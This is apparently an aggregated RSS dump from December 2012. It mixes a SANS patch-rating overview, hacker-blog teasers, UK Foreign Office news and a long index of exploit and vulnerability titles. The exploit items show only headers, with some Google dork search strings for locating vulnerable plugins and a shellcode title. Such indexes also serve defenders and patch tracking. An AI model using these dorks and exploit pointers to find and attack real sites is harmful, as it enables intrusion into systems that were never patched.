http://isc.sans.org/rssfeed_full.xml Overview of the December 2012 Microsoft patches and their status. # Affected Contra Indications - KB Known Exploits Microsoft rating(**) ISC rating(*) clients servers MS12-077 Internet Explorer Cumulative Patch (Replaces MS12-063 MS12-071 ) Internet Explorer 9/10 CVE-2012-2545 CVE-2012-4781 CVE-2012-4782 CVE-2012-4787 KB 2761465 No. Severity:Critical Exploitability: 1 Critical Critical MS12-078 Windows Kernel Mode Drivers Remote Execution (Replaces MS12-032 MS12-075 ) Kernel mode drivers CVE-2012-2556 CVE-2012-4786 KB 2783534 No. Severity:Critical Exploitability: 1 Critical Important MS12-079 Microsoft Word RTF Data Remote Code Execution (Replaces MS12-064 ) Word CVE-2012-2539 KB 2780642 No. Severity:Critical Exploitability: 1 Critical N/A MS12-080 Windows Exchange Server Remote Code Execution (Replaces MS12-058 ) Exchange Server CVE-2012-3214 CVE-2012-3217 CVE-2012-4791 KB 2784126 Yes. Severity:Critical Exploitability: 1 N/A Critical MS12-081 Windows File Handling Remote Code Execution (Replaces MS07-035 MS11-063 ) Windows CVE-2012-4774 KB 2758857 No. Severity:Critical Exploitability: 1 Critical Critical MS12-082 DirectPlay Remote Code Execution DirectPlay CVE-2012-1537 KB 2770660 No. Severity:Important Exploitability: 1 Critical Important MS12-083 IP-HTTPS Security Feature Bypass Direct Access CVE-2012-2549 KB 2765809 No. Severity:Important Exploitability: 1 Important Important We will update issues on this page for about a week or so as they evolve. We appreciate updates US based customers can call Microsoft for free patch related support on 1-866-PCSAFETY (*): ISC rating We use 4 levels: PATCH NOW: Typically used where we see immediate danger of exploitation. Typical environments will want to deploy these patches ASAP. Workarounds are typically not accepted by users or are not possible. This rating is often used when typical deployments make it vulnerable and exploits are being used or easy to obtain or make. Critical: Anything that needs little to become interesting for the dark side. Best approach is to test and deploy ASAP. Workarounds can give more time to test. Important: Things where more testing and other measures can help. Less Urgent: Typically we expect the impact if left unpatched to be not that big a deal in the short term. Do not forget them however. The difference between the client and server rating is based on how you use the affected machine. We take into account the typical client and server deployment in the usage of the machine and the common measures people typically have in place already. Measures we presume are simple best practices for servers such as not using outlook, MSIE, word etc. to do traditional office or leisure work. The rating is not a risk analysis as such. It is a rating of importance of the vulnerability and the perceived or even predicted threat for affected systems. The rating does not account for the number of affected systems there are. It is for an affected system in a typical worst-case role. Only the organization itself is in a position to do a full risk analysis involving the presence (or lack of) affected systems, the actually implemented measures, the impact on their operation and the value of the assets involved. All patches released by a vendor are important enough to have a close look if you use the affected systems. There is little incentive for vendors to publicize patches that do not have some form of risk to them. (**): The exploitability rating we show is the worst of them all due to the too large number of ratings Microsoft assigns to some of the patches. -- Post suggestions or comments in the section below or send us any questions or comments in the contact form -- John Bambenek bambenek /at/ gmail.com Bambenek Consulting (c) SANS Internet Storm Center. http://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

==> New Orkut – Upload Images/Songs/Videos in Profile

http://www.thehackerslibrary.com/?feed=rss New Orkut! The latest Buzz in the E-World. But now almost all have it. And its still fresh. Owing to the fact that its like Windows Vista compared to XP. [A huge copy of something else, but who cares as long as it looks good on your screen]. Well I am not here to write [...]

==> Get rid of Windows Vista Administrative Password

http://www.thehackerslibrary.com/?feed=rss Method 1: System Restore This only works in cases where you changed your password to something new and then forgot it or deleted a user account by accident. In order for this to work, there must be a System Restore point at which a logon was successful for the problem account. Also, this is not [...]

==> Static DLL Injection

http://www.thehackerslibrary.com/?feed=rss INTRODUCTION DEFINING DLL According to microsoft “A DLL is a library that contains code and data that can be used by more than one program at the same time. For example, in Windows operating systems, the Comdlg32 DLL performs common dialog box related functions. Therefore, each program can use the functionality that is contained in [...]

==> Microsoft’s WorldWide Telescope: Virtual telescope opens night sky

http://www.thehackerslibrary.com/?feed=rss Where science meets imagination ! Microsofts WorldWide Telescope Released. May 12th, 2008 Any Star Wars , Star Trek fan (like me) knows that space travel is not always easy, but Microsoft wants to make traveling the final frontier as simple as turning on your computer. Joining Google Sky and Stellarium is Microsofts entrant to the [...]

==> [ACM CCS'11] Reminder: Deadline Approaching (May 6, 2011)

http://www.infosecnews.org/isn.rss InfoSec News: [ACM CCS'11] Reminder: Deadline Approaching (May 6, 2011): Forwarded from: ACM CCS 2011 <acmccs2011 (at) gmail.com> Apologies for multiple copies of this announcement. The annual ACM Computer and Communications Security Conference is a leading international forum for information security researchers, practitioners, developers, and users to explore cutting-edge ideas and results, and to exchange techniques, tools, and experiences. The conference seeks submissions from academia, government, and industry presenting novel research on all practical and theoretical aspects of computer and communications security. Papers should have relevance to the construction, evaluation, application, or operation of secure systems. Theoretical papers must make a convincing argument for the practical significance of the results. All topic areas related to computer and communications security are of interest and in scope. Accepted papers will be published by ACM Press in the conference proceedings. Outstanding papers will be invited for possible publication in a special issue of the ACM Transactions on Information and System Security. Paper Submission Process Submissions must be made by the deadline of May 6, 2011, through the website: http://www.easychair.org/conferences/?conf=ccs2011 The review process will be carried out in two phases and authors will have an opportunity to comment on the first-phase reviews. Authors will be notified of the first-phase reviews on Monday, June 20, 2011 and can send back their comments by Thursday, June 23, 2011. Submitted papers must not substantially overlap papers that have been published or that are simultaneously submitted to a journal, conference or workshop. Simultaneous submission of the same work is not allowed. Authors of accepted papers must guarantee that their papers will be presented at the conference. Paper Format Submissions must be at most 10 pages in double-column ACM format (note: pages must be numbered) excluding the bibliography and well-marked appendices, and at most 12 pages overall. Submissions must NOT be anonymized. Only PDF or Postscript files will be accepted. Submissions not meeting these guidelines risk rejection without consideration of their merits. Tutorial Submissions Proposals for long (3-hour) and short (1.5-hour) tutorials on research topics of current and emerging interest should be submitted electronically to the tutorials chair by May 24, 2011. The guidelines for tutorial proposals can be found on the website. Important Dates - Paper submission due: Friday, May 6, 2011 (23:59 UTC - 11) - First round reviews communicated to authors: Monday, June 20, 2011 - Author comments due on: Thursday, June 23, 2011 (23:59 UTC - 11) - Acceptance notification: Friday, July 15, 2011 - Final papers due: Thursday, August 11, 2011 GENERAL CHAIR: Yan Chen (Northwestern University, USA) PROGRAM CHAIRS: George Danezis (Microsoft Research, UK) Vitaly Shmatikov (University of Texas at Austin, USA) PROGRAM COMMITTEE: Michael Backes (Saarland University and MPI-SWS, Germany) Bruno Blanchet (INRIA, Ecole Normale Superieure, and CNRS, France) Dan Boneh (Stanford University, USA) Nikita Borisov (University of Illinois at Urbana-Champaign, USA) Herbert Bos (VU, Netherlands) Srdjan Capkun (ETHZ, Switzerland) Avik Chaudhuri (Adobe Advanced Technology Labs, USA) Shuo Chen (Microsoft Research, USA) Manuel Costa (Microsoft Research, UK) Anupam Datta (CMU, USA) Stephanie Delaune (CNRS and ENS-Cachan, France) Roger Dingledine (The Tor Project, USA) Orr Dunkelman (University of Haifa and Weizmann Institute, Israel) Ulfar Erlingsson (Google, USA) Nick Feamster (Georgia Tech, USA) Bryan Ford (Yale University, USA) Cedric Fournet (Microsoft Research, UK) Paul Francis (MPI-SWS, Germany) Michael Freedman (Princeton University, USA) Guofei Gu (Texas A&M University, USA) Nicholas Hopper (University of Minnesota, USA) Collin Jackson (CMU Silicon Valley, USA) Markus Jakobsson (Paypal, USA) Jaeyeon Jung (Intel Labs Seattle, USA) Apu Kapadia (Indiana University Bloomington, USA) Jonathan Katz (University of Maryland, USA) Stefan Katzenbeisser (TU Darmstadt, Germany) Arvind Krishnamurthy (University of Washington, USA) Christopher Kruegel (University of California, Santa Barbara, USA) Ralf Kuesters (University of Trier, Germany) Ninghui Li (Purdue University, USA) Benjamin Livshits (Microsoft Research, USA) Heiko Mantel (TU Darmstadt, Germany) John Mitchell (Stanford University, USA) Fabian Monrose (University of North Carolina at Chapel Hill, USA) Steven Murdoch (University of Cambridge, UK) David Naccache (Ecole Normale Superieure, France) Arvind Narayanan (Stanford University, USA) Kenny Paterson (Royal Holloway, University of London, UK) Niels Provos (Google, USA) Mike Reiter (University of North Carolina at Chapel Hill, USA) Thomas Ristenpart (University of Wisconsin, USA) Hovav Shacham (University of California, San Diego, USA) Adam Smith (Pennsylvania State University, USA) Anil Somayaji (Carleton University, Canada) Francois-Xavier Standaert (UCL, Belgium) Eran Tromer (Tel Aviv University, Israel) Leendert Van Doorn (AMD, USA) Paul Van Oorschot (Carleton University, Canada) Bogdan Warinschi (University of Bristol, UK) Brent Waters (University of Texas at Austin, USA) Robert Watson (University of Cambridge, United Kingdom) Xiaowei Yang (Duke University, USA) Haifeng Yu (National University of Singapore, Singapore)

==> Championing Britain through commercial and economic diplomacy

http://feeds.feedburner.com/FcoLatestNewsRssFeed Foreign Secretary (crown copyright) Foreign Secretary William Hague tells British diplomats they must intensify work to champion the UK as a destination for foreign investment.

==> Foreign Secretary remarks at the Friends of Syria meeting

http://feeds.feedburner.com/FcoLatestNewsRssFeed Foreign Secretary William Hague | Crown Copyright The Foreign Secretary William Hague has outlined the immediate responsibilities for the Friends of Syria at the meeting in Marrakesh.

==> Government publishes Afghanistan progress report

http://feeds.feedburner.com/FcoLatestNewsRssFeed Afghan tribesmen take part in celebrations for the solar-based New Year's or Nowruz. GettyImages The Foreign Secretary William Hague has updated parliament on progress in Afghanistan during October 2012

==> Parental bleep Abduction is a worldwide problem

http://feeds.feedburner.com/FcoLatestNewsRssFeed bleep Abduction New figures reveal that the number of parental bleep abduction cases dealt with by the Foreign Office has risen by 88% in just under a decade.

==> Foreign Secretary condemns DPRK’s satellite launch

http://feeds.feedburner.com/FcoLatestNewsRssFeed Commenting on the launch of DPRK’s satellite, the Foreign Secretary, William Hague said:

==> UK calls for an immediate return to civilian rule in Mali

http://feeds.feedburner.com/FcoLatestNewsRssFeed Mark Simmonds Foreign Office Minister for Africa Mark Simmonds has tonight underlined his concern over the situation in Mali and called for an immediate return to civilian rule.

==> Piracy Ransoms Task Force publishes recommendations

http://feeds.feedburner.com/FcoLatestNewsRssFeed Piracy Today the Piracy Ransoms Task Force presented its conclusions on how to work together to reduce the threat of piracy and ultimately ransom payments to pirates.

==> Foreign Secretary met the King of Jordan

http://feeds.feedburner.com/FcoLatestNewsRssFeed Foreign Secretary and King or Jordan Today Foreign Secretary William Hague met His Majesty King Abdullah of Jordan and the Jordanian Foreign Minister Nasser Judeh.

==> The Foreign Secretary to attend Friends of Syria meeting in Marrakesh.

http://feeds.feedburner.com/FcoLatestNewsRssFeed Foreign & Commonwealth Office, Crown Copyright On 12 December representatives from over 130 countries and international organisations, will meet for the fourth Friends of Syria meeting to support the Syrian National Coalition and the Syrian People

==> Britain and the Philippines: Partners for Prosperity

http://feeds.feedburner.com/FcoLatestNewsRssFeed Hugo Swire Foreign Office Minister Hugo Swire has given a speech about the growing trade partnership between the UK and the Philippines.

==> Snare For Linux Cross Site Request Forgery

http://feeds.feedburner.com/securityalert_database?format=xml Topic: Snare For Linux Cross Site Request Forgery Risk: Low Text:Snare for Linux Cross-Site Request Forgery I. BACKGROUND - Snare for Linux

==> Snare For Linux Cross Site Scripting

http://feeds.feedburner.com/securityalert_database?format=xml Topic: Snare For Linux Cross Site Scripting Risk: Low Text:Snare for Linux Cross-Site Scripting via Log Injection I. BACKGROUND - Snare for

==> SimpleInvoices 2011.1 Cross Site Scripting

http://feeds.feedburner.com/securityalert_database?format=xml Topic: SimpleInvoices 2011.1 Cross Site Scripting Risk: Low Text:Overview SimpleInvoices 2011.1 is vulnerable to Cross-site Scripting (XSS).

==> gpEasy CMS XSS Vulnerability

http://feeds.feedburner.com/securityalert_database?format=xml Topic: gpEasy CMS XSS Vulnerability Risk: Low Text:1=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0

==> Axway Directory Traversal

http://feeds.feedburner.com/securityalert_database?format=xml Topic: Axway Directory Traversal Risk: Medium Text:Secure Transport Path Traversal Vulnerability Public Disclosure Date: November 11, 2012

==> HP Data Protector DtbClsLogin Buffer Overflow

http://feeds.feedburner.com/securityalert_database?format=xml Topic: HP Data Protector DtbClsLogin Buffer Overflow Risk: High Text:## # This file is part of the Metasploit Framework and may be subject to #

==> MyBB Profile Blog plugin multiple vulnerabilitie

http://feeds.feedburner.com/securityalert_database?format=xml Topic: MyBB Profile Blog plugin multiple vulnerabilitie Risk: Medium Text:# Exploit Title: MyBB Profile Blog plugin multiple vulnerabilities. # Google Dork: inurl:member.php intext:"Profile

==> MyBB plugin Bank v3 SQL Injection

http://feeds.feedburner.com/securityalert_database?format=xml Topic: MyBB plugin Bank v3 SQL Injection Risk: Medium Text:# Exploit Title: MyBB plugin SQLi 0day # Exploit Author: Red_Hat [NullSec] #

==> Joomla Jooproperty SQL Injection &Cross Site Scripting

http://feeds.feedburner.com/securityalert_database?format=xml Topic: Joomla Jooproperty SQL Injection &Cross Site Scripting Risk: Medium Text: 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0

==> Nagios Core 3.4.3 Buffer Overflow

http://feeds.feedburner.com/securityalert_database?format=xml Topic: Nagios Core 3.4.3 Buffer Overflow Risk: High Text:history.cgi is vulnerable to a buffer overflow due to the use of sprintf with user

==> Android Kernel 2.6 Denial Of Service

http://feeds.feedburner.com/securityalert_database?format=xml Topic: Android Kernel 2.6 Denial Of Service Risk: Medium Text:# Exploit Title: Android Kernel 2.6 Local DoS # Date: 12/7/12 # Author: G13 #

==> MyBB Kingchat Cross Site Scripting

http://feeds.feedburner.com/securityalert_database?format=xml Topic: MyBB Kingchat Cross Site Scripting Risk: Low Text:Exploit Title: MyBB 'kingchat' chat-box plugin. Google Dork: inurl:/kingchat.php?

==> DIMIN Viewer 5.4.0 WriteAV Arbitrary Code Execution

http://feeds.feedburner.com/securityalert_database?format=xml Topic: DIMIN Viewer 5.4.0 WriteAV Arbitrary Code Execution Risk: High Text:#!/usr/bin/perl # DIMIN Viewer 5.4.0 <= WriteAV Arbitrary Code Execution # Author: Jean Pascal Pereira

==> FreeVimager 4.1.0 WriteAV Arbitrary Code Execution

http://feeds.feedburner.com/securityalert_database?format=xml Topic: FreeVimager 4.1.0 WriteAV Arbitrary Code Execution Risk: High Text:#!/usr/bin/perl # FreeVimager 4.1.0 <= WriteAV Arbitrary Code

==> Dolphin3D web browser ActiveX Remote Command Execution

http://feeds.feedburner.com/securityalert_database?format=xml Topic: Dolphin3D web browser ActiveX Remote Command Execution Risk: High Text:## # # Dolphin3D web browser ActiveX Remote Command Execution # #

==> FreeFloat FTP Server Buffer Overflow

http://feeds.feedburner.com/securityalert_database?format=xml Topic: FreeFloat FTP Server Buffer Overflow Risk: High Text:#Exploit title: FreeFloat FTP Server Remote Command Execution USER Command

==> Cisco DPC2420 Cross Site Scripting & File Disclosure

http://feeds.feedburner.com/securityalert_database?format=xml Topic: Cisco DPC2420 Cross Site Scripting & File Disclosure Risk: High Text:## ## -> Title: DPC2420 Multiple vulnerabilities ## -> Author:

==> Havalite 1.1.7 Cross Site Scripting & Shell Upload

http://feeds.feedburner.com/securityalert_database?format=xml Topic: Havalite 1.1.7 Cross Site Scripting & Shell Upload Risk: High Text:# 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0

==> Site Builder RumahWeb Arbitrary Config File Disclosure Vulnerability

http://feeds.feedburner.com/securityalert_database?format=xml Topic: Site Builder RumahWeb Arbitrary Config File Disclosure Vulnerability Risk: High Text:: # Exploit Title : Site Builder RumahWeb Arbitrary Config.xml Disclosure Vulnerability : # Date : 08

==> Pixie v1.04 blog Add Admin

http://feeds.feedburner.com/securityalert_database?format=xml Topic: Pixie v1.04 blog Add Admin Risk: High Text: Pixie v1.04 blog Add Admin ## # Vendor :

==> KeenLook SQL injection Vulnerability

http://feeds.feedburner.com/securityalert_database?format=xml Topic: KeenLook SQL injection Vulnerability Risk: Medium Text:# Exploit Title: KeenLook sql injection Vulnerability # Date: 05/10/2012 #

==> Centrify Deployment Manager v2.1.0.283 Local Root

http://feeds.feedburner.com/securityalert_database?format=xml Topic: Centrify Deployment Manager v2.1.0.283 Local Root Risk: High Text:Centrify Deployment Manager v2.1.0.283 local root 12/7/2012

==> Centrify Deployment Manager v2.1.0.283 /tmp insecure file handling

http://feeds.feedburner.com/securityalert_database?format=xml Topic: Centrify Deployment Manager v2.1.0.283 /tmp insecure file handling Risk: High Text:Centrify Deployment Manager v2.1.0.283 While at a training session for centrify, I noticed poor handling of files in

==> TVMOBiLi Media Server 2.1.0.3557 Denial Of Service

http://feeds.feedburner.com/securityalert_database?format=xml Topic: TVMOBiLi Media Server 2.1.0.3557 Denial Of Service Risk: Medium Text:Advisory ID: HTB23120 Product: TVMOBiLi media server Vendor:

==> Achievo 1.4.5 Cross Site Scripting & SQL Injection

http://feeds.feedburner.com/securityalert_database?format=xml Topic: Achievo 1.4.5 Cross Site Scripting & SQL Injection Risk: Medium Text:Advisory ID: HTB23126 Product: Achievo Vendor: www.achievo.org

==> Splunk 5.0 Custom App Remote Code Execution

http://feeds.feedburner.com/securityalert_database?format=xml Topic: Splunk 5.0 Custom App Remote Code Execution Risk: High Text:## # This file is part of the Metasploit Framework and may be subject to #

==> WordPress Simple Gmail Login Path Disclosure

http://feeds.feedburner.com/securityalert_database?format=xml Topic: WordPress Simple Gmail Login Path Disclosure Risk: Low Text: # Application- Wordpress Plugin Simple Gmail Login Exploit - Stack Trace

==> ClipBucket 2.6 Revision 738 SQL Injection

http://feeds.feedburner.com/securityalert_database?format=xml Topic: ClipBucket 2.6 Revision 738 SQL Injection Risk: Medium Text:Advisory ID: HTB23125 Product: ClipBucket Vendor: clip-bucket.com

==> FreeFloat FTP Server Arbitrary File Upload

http://feeds.feedburner.com/securityalert_database?format=xml Topic: FreeFloat FTP Server Arbitrary File Upload Risk: High Text:## # This file is part of the Metasploit Framework and may be subject to #

==> Maxthon3 about:history XCS Trusted Zone Code Execution

http://feeds.feedburner.com/securityalert_database?format=xml Topic: Maxthon3 about:history XCS Trusted Zone Code Execution Risk: High Text:## # This file is part of the Metasploit Framework and may be

==> VLC Media Player 2.0.4 Buffer Overflow

http://feeds.feedburner.com/securityalert_database?format=xml Topic: VLC Media Player 2.0.4 Buffer Overflow Risk: High Text:Title : VLC media player 2.0.4 buffer overflow POC Version : 2.0.4 Twoflower Date

==> Kordil EDMS v2.2.60rc3 SQL Injection Vulnerability

http://feeds.feedburner.com/securityalert_database?format=xml Topic: Kordil EDMS v2.2.60rc3 SQL Injection Vulnerability Risk: Medium Text:# Exploit Title: Kordil EDMS v2.2.60rc3 SQL Injection Vulnerability # Date: 12/05/2012 # Exploit Author: Woody Hughes

==> IBM System Director Agent DLL Injection

http://feeds.feedburner.com/securityalert_database?format=xml Topic: IBM System Director Agent DLL Injection Risk: High Text:## # This file is part of the Metasploit Framework and may be subject to #

==> m0n0wall 1.33 Cross Site Request Forgery

http://feeds.feedburner.com/securityalert_database?format=xml Topic: m0n0wall 1.33 Cross Site Request Forgery Risk: Low Text: # # Exploit Title: m0n0wall 1.33 CSRF Remote root Access # Date:

==> Maxthon / Avant Browser XCS / Same Origin Bypass

http://feeds.feedburner.com/securityalert_database?format=xml Topic: Maxthon / Avant Browser XCS / Same Origin Bypass Risk: Medium Text:Hi, Below you can find a short summary of discovered vulnerabilities in Maxthon and Avant browsers. Such vulnerabilities

==> Adobe IndesignServer 5.5 SOAP Server Arbitrary Script Execution Vulnerability

http://feeds.feedburner.com/securityalert_database?format=xml Topic: Adobe IndesignServer 5.5 SOAP Server Arbitrary Script Execution Vulnerability Risk: High Text:## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial

==> NVIDIA Install Application 2.1002.85.551 Buffer Overflow

http://feeds.feedburner.com/securityalert_database?format=xml Topic: NVIDIA Install Application 2.1002.85.551 Buffer Overflow Risk: High Text:

==> web - gpEasy CMS - XSS Vulnerability

http://www.1337day.com/rss

==> web - WordPress ABC Test Plugin directory traversal

http://www.1337day.com/rss

==> web - WordPress ABC Test Plugin 0.1 Cross Site Script XSS

http://www.1337day.com/rss

==> web - MyBB Bank-v3 Plugin SQL Injection Vulnerability

http://www.1337day.com/rss

==> web - WordPress 3.5 multiple path disclosure vulnerabilities

http://www.1337day.com/rss

==> dos / - Nagios Core 3.4.3 Buffer Overflow Vulnerability

http://www.1337day.com/rss

==> local - Smartphone Pentest Framework 0.1.3 / 0.1.4 Command Injection

http://www.1337day.com/rss

==> remote - Snare Agent Linux Password Disclosure / CSRF Vulnerabilities

http://www.1337day.com/rss

==> web - MyBB Profile Blogs Plugin 1.2 Multiple Vulnerabilities

http://www.1337day.com/rss

==> remote - HP Data Protector DtbClsLogin Buffer Overflow

http://www.1337day.com/rss

==> web - Joomla Component com_jooproperty Sql Injection / Xss Vulnerability

http://www.1337day.com/rss

==> web - WordPress SEO Plugin 1.3.11 Cross Site Script Vulnerability

http://www.1337day.com/rss

==> remote - Dolphin3D 1.52 / 1.60 Command Execution Vulnerability

http://www.1337day.com/rss

==> local - DIMIN Viewer 5.4.0 <= WriteAV Arbitrary Code Execution Vulnerabilit

http://www.1337day.com/rss

==> local - FreeVimager 4.1.0 <= WriteAV Arbitrary Code Execution Vulnerability

http://www.1337day.com/rss

==> remote - Nagios XI Network Monitor Graph Explorer Component Command Injection

http://www.1337day.com/rss

==> dos / - Android Kernel 2.6 Local DoS Crash PoC

http://www.1337day.com/rss

==> dos / - Sumatra 2.1.1/MuPDF 1.0 Integer Overflow

http://www.1337day.com/rss

==> web - MyBB KingChat Plugin Persistent XSS Vulnerability

http://www.1337day.com/rss

==> web - Havalite v1.1.7 Mutiple Vulnerabilities

http://www.1337day.com/rss

==> web - Cisco DPC2420 Multiples Vulnerabilities

http://www.1337day.com/rss

==> web - Jahia 5.x CSRF Exploit

http://www.1337day.com/rss

==> web - vBulletin Announcements Cookie Steal Vulnerability

http://www.1337day.com/rss

==> web - Jahia Enterprise v6.6.0.0 CSRF Vulnerability

http://www.1337day.com/rss

==> local - Geany <=1.22 Local Code injection Vulnerability

http://www.1337day.com/rss

==> web - KeenLook sql injection Vulnerability

http://www.1337day.com/rss

==> local - Steam Linux Closed Beta bypass authorization

http://www.1337day.com/rss

==> web - Pixie v1.04 blog Add Admin Vulnerability

http://www.1337day.com/rss

==> web - Site Builder RumahWeb Arbitrary Config File Disclosure Vulnerability

http://www.1337day.com/rss

==> remote - FreeFloat FTP Server Arbitrary File Upload Vulnerability

http://www.1337day.com/rss

==> remote - Maxthon3 about:history XCS Trusted Zone Code Execution

http://www.1337day.com/rss

==> remote - Splunk 5.0 Custom App Remote Code Execution

http://www.1337day.com/rss

==> local - Centrify Deployment Manager 2.1.0.283 Local Root Vulnerability

http://www.1337day.com/rss

==> dos / - TVMOBiLi Media Server 2.1.0.3557 Denial Of Service

http://www.1337day.com/rss

==> web - ClipBucket 2.6 Revision 738 SQL Injection Vulnerability

http://www.1337day.com/rss

==> web - Achievo 1.4.5 Cross Site Scripting / SQL Injection Vulnerabilities

http://www.1337day.com/rss

==> remote - Free Float FTP Server Remote Command Execution USER Command Buffer Overflow

http://www.1337day.com/rss

==> web - IPBoard 3.x.x/3.4 Full Path Disclosure

http://www.1337day.com/rss

==> web - m0n0wall 1.33 Cross Site Request Forgery Vulnerability

http://www.1337day.com/rss

==> remote - IBM System Director Agent DLL Injection Vulnerability

http://www.1337day.com/rss

==> local - RealPlayer .html v15.0.6.14 Memory Corruption and Overflow POC

http://www.1337day.com/rss

==> dos / - VLC media player 2.0.4 buffer overflow PoC

http://www.1337day.com/rss

==> dos / - NVIDIA Install Application 2.1002.85.551 Buffer Overflow Vulnerability

http://www.1337day.com/rss

==> [shellcode] - Linux/x86 - execve /bin/sh shellcode 23 bytes

http://www.1337day.com/rss

==> remote - Adobe IndesignServer 5.5 SOAP Server Arbitrary Script Execution Vulnerability

http://www.1337day.com/rss

==> web - vBulletin 4.x/5.x multiple Full Puth Disclosure Vulnerability

http://www.1337day.com/rss

==> web - Moodle 1.9.14.2 Full Puth Disclosure Vulnerability

http://www.1337day.com/rss

==> web - Wordpress 3.4.2 JetPack Full Path Disclosure

http://www.1337day.com/rss

==> web - OpenCart v. 1.5.1.3 Full Path Disclosure Multiple

http://www.1337day.com/rss

==> web - Wordpress Plugins - my-link-order Full Path Disclosure Vulnerability

http://www.1337day.com/rss

==> remote - Buffalo Linkstation Privilege Escalation Vulnerability

http://www.1337day.com/rss

==> web - Kordil EDMS 2.2.60rc3 SQL Injection Vulnerability

http://www.1337day.com/rss

==> web - FOOT Gestion CMS SQL Injection Vulnerability

http://www.1337day.com/rss

==> web - Wirtualna Polska S.A. (WP) XSS / CSRF Vulnerability

http://www.1337day.com/rss

==> web - ManageEngine MSPCentral 9 CSRF / Cross Site Scripting Vulnerability

http://www.1337day.com/rss

==> remote - Tectia SSH USERAUTH Change Request Password Reset

http://www.1337day.com/rss

==> remote - Ektron 8.02 XSLT Transform Remote Code Execution

http://www.1337day.com/rss

==> web - Debliteck service Ltd sql injection Vulnerability

http://www.1337day.com/rss

==> local - Free WMA to MP3 converter 1.6 - Local buffer overflow [SEH]

http://www.1337day.com/rss

==> web - IM Sources Control Panel SQL Injection Vulnerability

http://www.1337day.com/rss

==> web - 53KF sql injection Vulnerability

http://www.1337day.com/rss

==> web - Scarlet Daisy Web Content Management System sql injection Vulnerability

http://www.1337day.com/rss

==> web - TRENDNET TEW-432BRP CSRF Vulnerability

http://www.1337day.com/rss

==> local - Centrify Deployment Manager v2.1.0.283 File Overwrite Vulnerability

http://www.1337day.com/rss

==> web - Marketing Development Script SQL Injection Vulnerability

http://www.1337day.com/rss

==> web - myBB KingChat Plugin SQL Injection Vulnerability

http://www.1337day.com/rss

==> web - School CMS Persistent XSS Vulnerability

http://www.1337day.com/rss

==> web - Advantech Studio v7.0 SCADA/HMI Directory Traversal 0-day

http://www.1337day.com/rss

==> web - Wordpress 3.4.2 Full Path Disclosure Vulnerability

http://www.1337day.com/rss

==> web - Newscoop 4.0.2 Blind SQLi & Path Disclosure Vulnerabilities

http://www.1337day.com/rss

==> web - vBulletin 4.2.0 Full Path Disclosure Vulnerability

http://www.1337day.com/rss

==> web - Buffalo Linkstation Privilege Escalation / Information Disclosure Vulnerabilities

http://www.1337day.com/rss

==> web - RIM BlackBerry PlayBook OS 1.0.8.6067 Local File Access Vulnerability

http://www.1337day.com/rss

==> web - Tinymcpuk 0.3 Cross Site Scripting Vulnerability

http://www.1337day.com/rss

==> web - Ncentral 8.x Insecure Access / Unsalted Passwords / CSRF Vulnerabilities

http://www.1337day.com/rss

==> web - Kaseya 6.2 Cross Site Scripting Vulnerability

http://www.1337day.com/rss

==> web - Libsyn Cross Site Scripting Vulnerability

http://www.1337day.com/rss

==> web - Symantec Messaging Gateway 9.5.3-3 Arbitrary File Download

http://www.1337day.com/rss

==> web - Symantec Messaging Gateway 9.5.3-3 CSRF Vulnerability

http://www.1337day.com/rss

==> web - FirePass SSL VPN Unauthenticated Local File Inclusion Vulnerability

http://www.1337day.com/rss

==> web - vBulletin 3.x <= 4.2.0 FAQ (Echo config) trick

http://www.1337day.com/rss

==> web - E-MARSOUM SQL Injection Vulnerability

http://www.1337day.com/rss

==> dos / - Opera Web Browser 12.11 Crash PoC

http://www.1337day.com/rss

==> remote - MySQL Windows Remote System Level Exploit (Stuxnet technique) 0day

http://www.1337day.com/rss

==> remote - SSH.com Communications SSH Tectia Authentication Bypass Remote Zeroday Exploit

http://www.1337day.com/rss

==> remote - MySQL Remote Preauth User Enumeration Zeroday

http://www.1337day.com/rss

==> remote - FreeFTPD Remote Authentication Bypass Zeroday Exploit

http://www.1337day.com/rss

==> remote - FreeSSHD Remote Authentication Bypass Zeroday Exploit

http://www.1337day.com/rss

==> dos / - MySQL (Linux) Stack Based Buffer Overrun PoC Zeroday

http://www.1337day.com/rss

==> remote - MySQL 5.1/5.5 WiNDOWS REMOTE R00T (mysqljackpot)

http://www.1337day.com/rss

==> local - MySQL (Linux) Database Privilege Elevation Zeroday Exploit

http://www.1337day.com/rss

==> dos / - MySQL Denial of Service Zeroday PoC

http://www.1337day.com/rss

==> dos / - MySQL (Linux) Heap Based Overrun PoC Zeroday

http://www.1337day.com/rss

==> remote - IBM System Director Remote System Level Exploit

http://www.1337day.com/rss

==> dos / - Mozilla FireFox 17.0.1 Memory Corruption PoC

http://www.1337day.com/rss

==> web - jquery.uploadify-v2.1.4 Arbitrary File Upload Vulnerability

http://www.1337day.com/rss

==> dos / - Android 4.0.3 <= Browser Remote Crash Exploit

http://www.1337day.com/rss

==> Audits and compliance requirements for cloud computing

http://feeds.pheedo.com/tt/1323 Even as India Inc experiments with the cloud, security concerns play spoilsport. These cloud computing audit and compliance tips will make your journey easier. Add to digg Add to StumbleUpon Add to del.icio.us Add to Google

==> Cutwail botnet spam campaign tied to Zeus banking Trojan

http://feeds.pheedo.com/tt/1323 The cybercriminals connected to the notorious Zeus Trojan are using the Cutwail botnet to distribute spam designed to steal account credentials. Add to digg Add to StumbleUpon Add to del.icio.us Add to Google

==> PCI validation: Requirements for merchants covered by PCI DSS

http://feeds.pheedo.com/tt/1323 Mike Chapple details the PCI validation requirements for merchants covered by PCI DSS. Add to digg Add to StumbleUpon Add to del.icio.us Add to Google

==> VoIP security strategy helps WNS tackle cross-party risk

http://feeds.pheedo.com/tt/1323 Indian BPO major WNS ensures robust risk management and PCI-DSS compliance through simple VoIP security solution, despite outdated client infrastructure. Add to digg Add to StumbleUpon Add to del.icio.us Add to Google

==> Analysis: Windows 8 security features improve on Windows 7 security

http://feeds.pheedo.com/tt/1323 Expert Michael Cobb says Windows 8's security features, like Windows Defender and Secure Boot, are a step forward for desktop and BYOD security. Add to digg Add to StumbleUpon Add to del.icio.us Add to Google

